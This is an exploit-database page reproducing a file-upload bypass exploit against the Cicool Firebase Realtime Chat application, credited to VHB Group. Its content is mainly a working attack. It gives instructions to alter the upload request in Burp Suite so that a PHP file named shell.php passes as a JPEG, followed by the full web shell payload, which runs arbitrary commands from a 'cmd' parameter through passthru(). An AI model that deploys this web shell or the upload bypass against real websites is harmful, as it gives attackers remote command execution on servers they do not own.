Looking for a fix? Check your Codebase security with multiple scanners from

Edit Report

Our sensors found this exploit at:

Below is a copy:

Cicool - Firebase Realtime Chat upload shell bypass
[+] Exploit Title : Cicool - Firebase Realtime Chat upload shell bypass

[+] Author :
[+] Team: VHB Group
[+] Tested on : Windows 10/Linux
[+] Home Page:
[+] Demo :

fix queries with burp suite. You can go to the chat page and edit the information

Content-Disposition: form-data; name="qqfile"; filename="shell.php"
Content-Type: image/jpeg

<form action="" method="get">
Command: <input type="text" name="cmd" /><input type="submit" value="Exec" />
Output:<br />
<pre><?php passthru($_REQUEST['cmd'], $result); ?></pre>


Copyright ©2019 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.